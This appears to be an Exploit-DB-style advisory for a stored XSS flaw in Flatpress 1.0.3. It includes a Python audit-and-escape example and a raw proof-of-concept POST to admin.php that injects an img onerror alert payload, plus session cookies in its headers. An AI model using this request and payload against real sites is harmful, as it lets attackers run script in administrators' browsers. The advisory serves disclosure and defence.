Vendor: Flatpress Add Blog
By: Alperen Ergel
CVSS: 4.8 (MEDIUM)
Persistent Cross-Site Scripting
CWE: 79
Product Name: Flatpress Add Blog
Affected Version From: 1.0.3
Affected Version To: 1.0.3
Patch Exists: YES
Related CVE: CVE-2020-35241
CPE: a:flatpress:flatpress:1.0.3
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Windows 10 / XAMPP
2020

Flatpress Add Blog 1.0.3 – Persistent Cross-Site Scripting

Flatpress Add Blog 1.0.3 is vulnerable to persistent cross-site scripting. An attacker can inject malicious JavaScript code into the content parameter of the POST request to the admin.php page. This code will be executed when the page is loaded by an authenticated user.

Mitigation:

The vendor has released a patch to address this vulnerability. Users should upgrade to the latest version of the software.
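
For reviewing stored entries or request logs, here is an added example (not Flatpress code and not the vendor's patch): it parses a form body shaped like the request shown on this page, reports script-capable markup in the content field, and returns the value HTML-escaped as one output-encoding approach. The names ActiveMarkupFinder and audit_entry_body and the sample bodies are assumptions made for illustration.

```python
from html import escape
from html.parser import HTMLParser
from urllib.parse import parse_qs

# Elements that load or run active content (conservative, not exhaustive).
ACTIVE_TAGS = {"script", "iframe", "object", "embed"}


class ActiveMarkupFinder(HTMLParser):
    """Collects script-capable constructs found in a submitted field."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag in ACTIVE_TAGS:
            self.findings.append(f"<{tag}> element")
        for name, value in attrs:
            if name.startswith("on"):  # onerror, onload, onclick, ...
                self.findings.append(f"{name} handler on <{tag}>")
            elif (value or "").strip().lower().startswith("javascript:"):
                self.findings.append(f"javascript: URL in {name} on <{tag}>")


def audit_entry_body(body, field="content"):
    """Return (findings, escaped_value) for one field of a urlencoded body."""
    values = parse_qs(body, keep_blank_values=True).get(field, [""])
    finder = ActiveMarkupFinder()
    finder.feed(values[0])
    finder.close()
    return finder.findings, escape(values[0], quote=True)


# Constructed sample bodies modelled on the request shown on this page.
STORED_XSS = (
    "subject=XSS&content=<img src=x onerror='alert(\"TEST XSS\")'/>"
    "&savecontinue=Save%26Continue"
)
BENIGN = "subject=Hello&content=A+plain+post+with+%3Cb%3Ebold%3C%2Fb%3E+text"

if __name__ == "__main__":
    for body in (STORED_XSS, BENIGN):
        findings, safe = audit_entry_body(body)
        print(findings or "clean", "->", safe)
```

Escaping every character is the strictest choice; a blog that must keep some formatting would need an allow-list sanitizer instead, which this example does not implement.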

Exploit-DB raw data:

# Exploit Title: Flatpress Add Blog 1.0.3 - Persistent Cross-Site Scripting
# Date: 2020-09-19
# Exploit Author: Alperen Ergel
# Vendor Homepage: https://www.flatpress.org/
# Software Link: https://github.com/evacchi/flatpress/releases/tag/v1.0.3
# Version: 1.0.3 
# Tested on: windows 10 / xampp 
# CVE : CVE-2020-35241


# Proof Of Concept

POST /flatpress/admin.php?p=entry&action=write HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 223
Origin: http://localhost/
Connection: close
Referer: http://localhost/flatpress/admin.php?p=entry&action=write
Cookie: fpuser_fp-a53f4609=opensourcecms; fppass_fp-a53f4609=79dc9a3c529fcd0d9dc4fc7ff22187b6; fpsess_fp-a53f4609=71v18tu3lsc0s021q2pj8a3je7; _ga=GA1.2.487908813.1600520069; _gid=GA1.2.951134816.1600520069; _gat=1
Upgrade-Insecure-Requests: 1

_wpnonce=4fc4222db1&_wp_http_referer=%2Fflatpress%2Fadmin.php%3Fp%3Dentry%26action%3Dwrite&subject=XSS&timestamp=1600526382&
entry=entry200919-143942&attachselect=--&imageselect=--&content=<img src=x onerror='alert("TEST XSS")'/>&savecontinue=Save%26Continue


# Snippet

content=[PAYLOAD] //<img src=x onerror='alert("TEST XSS")'/>